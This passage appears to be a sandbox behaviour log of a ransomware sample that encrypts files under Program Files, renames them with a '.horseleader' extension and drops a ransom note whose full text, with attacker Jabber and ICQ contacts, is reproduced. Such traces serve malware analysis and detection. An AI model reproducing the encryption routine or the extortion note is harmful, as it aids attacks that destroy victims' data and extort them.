lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.955] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.955] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.955] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.956] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.956] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.956] CloseHandle (hObject=0x158) returned 1 [0245.956] GetProcessHeap () returned 0x780000 [0245.956] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.957] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV.horseleader") returned 83 [0245.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv.horseleader")) returned 1 [0245.958] GetProcessHeap () returned 0x780000 [0245.958] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.958] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xc2294b80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x46b70, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPFT632.CNV", cAlternateFileName="")) returned 0 [0245.958] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.958] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\#Decrypt#.txt") returned 73 [0245.958] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.959] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.959] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.961] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.961] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.961] CloseHandle (hObject=0x21c) returned 1 [0245.961] GetProcessHeap () returned 0x780000 [0245.961] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.961] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0245.961] lstrcmpiW (lpString1="THEMES14", lpString2="Windows") returned -1 [0245.962] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14") returned 59 [0245.962] lstrcmpW (lpString1="THEMES14", lpString2=".") returned 1 [0245.962] lstrcmpW (lpString1="THEMES14", lpString2="..") returned 1 [0245.962] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.962] GetProcessHeap () returned 0x780000 [0245.962] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.962] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*") returned 61 [0245.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.967] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.967] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\.") returned 61 [0245.967] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.967] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.968] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.968] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\..") returned 62 [0245.968] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.968] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.968] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="AFTRNOON", cAlternateFileName="")) returned 1 [0245.968] lstrcmpiW (lpString1="AFTRNOON", lpString2="Windows") returned -1 [0245.969] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned 68 [0245.969] lstrcmpW (lpString1="AFTRNOON", lpString2=".") returned 1 [0245.969] lstrcmpW (lpString1="AFTRNOON", lpString2="..") returned 1 [0245.969] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.969] GetProcessHeap () returned 0x780000 [0245.969] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.969] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*") returned 70 [0245.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0245.969] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.969] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\.") returned 70 [0245.970] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.970] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0245.970] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.970] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\..") returned 71 [0245.970] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.970] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.970] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad6ec00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdad6ec00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xe58e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="AFTRNOON.ELM", cAlternateFileName="")) returned 1 [0245.970] lstrcmpiW (lpString1="AFTRNOON.ELM", lpString2="Windows") returned -1 [0245.970] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM") returned 81 [0245.970] StrStrIW (lpFirst="AFTRNOON.ELM", lpSrch=".horseleader") returned 0x0 [0245.970] lstrcmpW (lpString1="AFTRNOON.ELM", lpString2="#Decrypt#.txt") returned 1 [0245.970] lstrcmpW (lpString1="AFTRNOON.ELM", lpString2="_uninstalling_.png") returned 1 [0245.970] lstrlenW (lpString=".testttjffg") returned 11 [0245.971] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM", lpSrch=".testttjffg") returned 0x0 [0245.971] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.971] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.977] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM") returned 81 [0245.977] StrStrW (lpFirst="AFTRNOON.ELM", lpSrch=".txt") returned 0x0 [0245.977] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=58766) returned 1 [0245.977] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.983] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.983] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.983] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.984] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.984] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.985] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x458e, lpOverlapped=0x0) returned 1 [0245.985] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffba72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x458e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x458e, lpOverlapped=0x0) returned 1 [0245.985] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.986] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.986] CloseHandle (hObject=0x1a4) returned 1 [0245.986] GetProcessHeap () returned 0x780000 [0245.986] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.986] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM.horseleader") returned 93 [0245.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm.horseleader")) returned 1 [0245.987] GetProcessHeap () returned 0x780000 [0245.988] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.988] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e63000, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86e63000, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="AFTRNOON.INF", cAlternateFileName="")) returned 1 [0245.988] lstrcmpiW (lpString1="AFTRNOON.INF", lpString2="Windows") returned -1 [0245.988] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF") returned 81 [0245.988] StrStrIW (lpFirst="AFTRNOON.INF", lpSrch=".horseleader") returned 0x0 [0245.988] lstrcmpW (lpString1="AFTRNOON.INF", lpString2="#Decrypt#.txt") returned 1 [0245.988] lstrcmpW (lpString1="AFTRNOON.INF", lpString2="_uninstalling_.png") returned 1 [0245.988] lstrlenW (lpString=".testttjffg") returned 11 [0245.988] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF", lpSrch=".testttjffg") returned 0x0 [0245.988] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.988] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.989] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF") returned 81 [0245.989] StrStrW (lpFirst="AFTRNOON.INF", lpSrch=".txt") returned 0x0 [0245.989] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=555) returned 1 [0245.989] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x22b, lpOverlapped=0x0) returned 1 [0245.990] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.991] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x22b, lpOverlapped=0x0) returned 1 [0245.991] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.991] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.992] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.992] CloseHandle (hObject=0x1a4) returned 1 [0245.992] GetProcessHeap () returned 0x780000 [0245.992] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.992] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF.horseleader") returned 93 [0245.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.inf.horseleader")) returned 1 [0245.996] GetProcessHeap () returned 0x780000 [0245.996] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.996] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b50300, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x85b50300, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x621, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0245.996] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0245.996] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 